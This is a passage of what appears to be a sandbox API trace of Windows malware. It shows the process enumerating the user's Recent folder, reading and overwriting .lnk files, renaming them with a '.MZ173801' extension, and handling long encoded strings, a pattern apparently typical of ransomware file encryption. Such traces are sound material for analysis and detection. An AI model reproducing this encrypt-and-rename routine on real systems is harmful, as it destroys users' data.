lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0107.367] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0107.367] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CSedB5fZ.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\csedb5fz.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74e02d76, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x74e02d76, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x74e02d76, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x3d6)) returned 1 [0107.367] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0107.367] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0107.368] GetCurrentThreadId () returned 0x1358 [0107.368] GetCurrentThreadId () returned 0x1358 [0107.368] GetCurrentThreadId () returned 0x1358 [0107.368] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0107.368] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0107.368] GetCurrentThreadId () returned 0x1358 [0107.368] GetCurrentThreadId () returned 0x1358 [0107.368] GetCurrentThreadId () returned 0x1358 [0107.369] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CSedB5fZ.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\csedb5fz.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0107.369] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0107.369] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0107.369] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x3d6 [0107.369] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0107.369] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x3d6, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x3d6, lpOverlapped=0x0) returned 1 [0107.370] CloseHandle (hObject=0x3f4) returned 1 [0107.370] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CSedB5fZ.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\csedb5fz.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0107.371] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x3d6, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x3d6, lpOverlapped=0x0) returned 1 [0107.372] CloseHandle (hObject=0x3f4) returned 1 [0107.372] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CSedB5fZ.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\csedb5fz.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CSedB5fZ.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\csedb5fz.lnk.mz173801")) returned 1 [0107.373] GetCurrentThreadId () returned 0x1358 [0107.373] GetCurrentThreadId () returned 0x1358 [0107.373] GetCurrentThreadId () returned 0x1358 [0107.373] GetCurrentThreadId () returned 0x1358 [0107.373] GetCurrentThreadId () returned 0x1358 [0107.373] GetCurrentThreadId () returned 0x1358 [0107.373] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbf9a81f7, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xb6d1c405, ftLastAccessTime.dwHighDateTime=0x1d5e7c2, ftLastWriteTime.dwLowDateTime=0xb6d1c405, ftLastWriteTime.dwHighDateTime=0x1d5e7c2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="CustomDestinations", cAlternateFileName="CUSTOM~1")) returned 1 [0107.373] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x44111bf3, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x44111bf3, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce389e99, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1b0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0107.373] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0107.373] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0107.373] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb18b052, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xeb18b052, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xeb18b052, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x3b9, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="Dfoi.lnk", cAlternateFileName="")) returned 1 [0107.373] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0107.373] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0107.373] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Dfoi.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\dfoi.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb18b052, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xeb18b052, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xeb18b052, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x3b9)) returned 1 [0107.374] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0107.374] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0107.374] GetCurrentThreadId () returned 0x1358 [0107.374] GetCurrentThreadId () returned 0x1358 [0107.374] GetCurrentThreadId () returned 0x1358 [0107.375] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0107.375] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU